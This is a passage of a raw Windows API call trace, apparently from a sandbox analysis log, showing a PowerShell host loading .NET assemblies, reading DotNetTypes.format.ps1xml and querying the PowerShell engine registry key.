GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0029.406] GetLastError () returned 0x0 [0029.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0029.407] GetLastError () returned 0x57 [0029.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0029.414] GetLastError () returned 0x57 [0029.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.420] GetLastError () returned 0x57 [0029.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0029.424] GetLastError () returned 0x57 [0029.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0029.426] GetLastError () returned 0x57 [0029.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0029.427] GetLastError () returned 0x57 [0029.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0029.428] GetLastError () returned 0x57 [0029.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0029.428] GetLastError () returned 0x57 [0029.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0029.430] GetLastError () returned 0x57 [0029.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0029.430] GetLastError () returned 0x57 [0029.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.431] GetLastError () returned 0x57 [0029.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0029.432] GetLastError () returned 0x57 [0029.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0029.432] GetLastError () returned 0x57 [0029.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0029.433] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0029.434] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0029.434] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0029.434] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.434] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.434] GetLastError () returned 0x57 [0029.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.435] GetLastError () returned 0x57 [0029.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.435] GetLastError () returned 0x57 [0029.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.435] GetLastError () returned 0x57 [0029.467] VirtualQuery (in: lpAddress=0x24d390, lpBuffer=0x24e390, dwLength=0x1c | out: lpBuffer=0x24e390*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.470] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x79371353, Data2=0xcc9c, Data3=0x4112, Data4=([0]=0x96, [1]=0xd3, [2]=0x34, [3]=0x37, [4]=0x11, [5]=0x91, [6]=0xfb, [7]=0xf4))) returned 0x0 [0029.471] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x59d63c09, Data2=0x27a1, Data3=0x4290, Data4=([0]=0x8b, [1]=0x5c, [2]=0x5c, [3]=0x6a, [4]=0xfc, [5]=0xd3, [6]=0x18, [7]=0xa7))) returned 0x0 [0029.471] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.471] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.471] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x7aa58814, Data2=0x22a3, Data3=0x42e4, Data4=([0]=0x97, [1]=0x20, [2]=0x9d, [3]=0x9f, [4]=0xf3, [5]=0xda, [6]=0x93, [7]=0x41))) returned 0x0 [0029.472] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x500976c8, Data2=0x4964, Data3=0x4262, Data4=([0]=0x8a, [1]=0x75, [2]=0x66, [3]=0x5f, [4]=0x32, [5]=0x41, [6]=0x23, [7]=0xfd))) returned 0x0 [0029.472] VirtualQuery (in: lpAddress=0x24d534, lpBuffer=0x24e534, dwLength=0x1c | out: lpBuffer=0x24e534*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.472] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.472] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.473] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x87a7c66c, Data2=0xf61a, Data3=0x4fbb, Data4=([0]=0xa9, [1]=0xf0, [2]=0x8b, [3]=0x3b, [4]=0x64, [5]=0x9, [6]=0x44, [7]=0x98))) returned 0x0 [0029.473] VirtualQuery (in: lpAddress=0x24d534, lpBuffer=0x24e534, dwLength=0x1c | out: lpBuffer=0x24e534*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.473] VirtualQuery (in: lpAddress=0x24d44c, lpBuffer=0x24e44c, dwLength=0x1c | out: lpBuffer=0x24e44c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.474] VirtualQuery (in: lpAddress=0x24d100, lpBuffer=0x24e100, dwLength=0x1c | out: lpBuffer=0x24e100*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.474] VirtualQuery (in: lpAddress=0x24d100, lpBuffer=0x24e100, dwLength=0x1c | out: lpBuffer=0x24e100*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.474] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x9824000, Data2=0x4ddc, Data3=0x424f, Data4=([0]=0xb0, [1]=0x88, [2]=0x0, [3]=0x8e, [4]=0x7c, [5]=0xf8, [6]=0xe9, [7]=0x70))) returned 0x0 [0029.474] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x44e0313, Data2=0x8881, Data3=0x4392, Data4=([0]=0xa3, [1]=0x84, [2]=0x4c, [3]=0xa0, [4]=0x71, [5]=0xf8, [6]=0xdc, [7]=0x5))) returned 0x0 [0029.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.474] GetLastError () returned 0x57 [0029.474] SetErrorMode (uMode=0x1) returned 0x1 [0029.474] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.474] GetLastError () returned 0x0 [0029.474] GetFileType (hFile=0x300) returned 0x1 [0029.475] SetErrorMode (uMode=0x1) returned 0x1 [0029.475] GetFileType (hFile=0x300) returned 0x1 [0029.475] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.477] GetLastError () returned 0x0 [0029.477] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.477] GetLastError () returned 0x0 [0029.478] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.478] GetLastError () returned 0x0 [0029.478] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.478] GetLastError () returned 0x0 [0029.478] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.479] GetLastError () returned 0x0 [0029.479] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.479] GetLastError () returned 0x0 [0029.479] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.479] GetLastError () returned 0x0 [0029.479] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.479] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.480] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.480] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.480] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.480] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.480] GetLastError () returned 0x0 [0029.480] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.481] GetLastError () returned 0x0 [0029.481] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.481] GetLastError () returned 0x0 [0029.481] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.481] GetLastError () returned 0x0 [0029.483] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0xbce, lpOverlapped=0x0) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] ReadFile (in: hFile=0x300, lpBuffer=0x248b0ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b0ae*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] ReadFile (in: hFile=0x300, lpBuffer=0x248b940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x248b940*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] CloseHandle (hObject=0x300) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.483] GetLastError () returned 0x0 [0029.483] SetErrorMode (uMode=0x1) returned 0x1 [0029.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24ac93c | out: lpFileInformation=0x24ac93c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0029.483] GetLastError () returned 0x0 [0029.483] SetErrorMode (uMode=0x1) returned 0x1 [0029.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.484] GetLastError () returned 0x0 [0029.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.484] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.484] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.484] RegCloseKey (hKey=0x300) returned 0x0 [0029.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.484] GetLastError () returned 0x0 [0029.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0029.484] GetLastError () returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x17bcd6e3, Data2=0xad93, Data3=0x4a45, Data4=([0]=0xab, [1]=0x1d, [2]=0x88, [3]=0x81, [4]=0x0, [5]=0xb9, [6]=0xf, [7]=0xc9))) returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2358084e, Data2=0x63d8, Data3=0x4d09, Data4=([0]=0xb5, [1]=0x9f, [2]=0x14, [3]=0xa4, [4]=0xdf, [5]=0x75, [6]=0xd1, [7]=0xc9))) returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x4e081b59, Data2=0x8a2b, Data3=0x42fb, Data4=([0]=0x90, [1]=0xeb, [2]=0xb9, [3]=0x54, [4]=0x4, [5]=0x99, [6]=0x9, [7]=0xcf))) returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5180d250, Data2=0xa9ab, Data3=0x4597, Data4=([0]=0x93, [1]=0xc2, [2]=0xcf, [3]=0x62, [4]=0x2f, [5]=0x92, [6]=0x98, [7]=0x87))) returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x29d0bfab, Data2=0x4ce7, Data3=0x4efe, Data4=([0]=0x91, [1]=0xac, [2]=0xc5, [3]=0xa8, [4]=0x75, [5]=0xf1, [6]=0x1b, [7]=0x24))) returned 0x0 [0029.487] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xbf5bbbc1, Data2=0x5e0c, Data3=0x4a89, Data4=([0]=0x9a, [1]=0x6c, [2]=0x5d, [3]=0x2e, [4]=0x4a, [5]=0x76, [6]=0x2, [7]=0xe9))) returned 0x0 [0029.488] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.488] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc5e44391, Data2=0xb440, Data3=0x4d45, Data4=([0]=0xbb, [1]=0x95, [2]=0xeb, [3]=0xb, [4]=0x30, [5]=0xa1, [6]=0x8e, [7]=0xa6))) returned 0x0 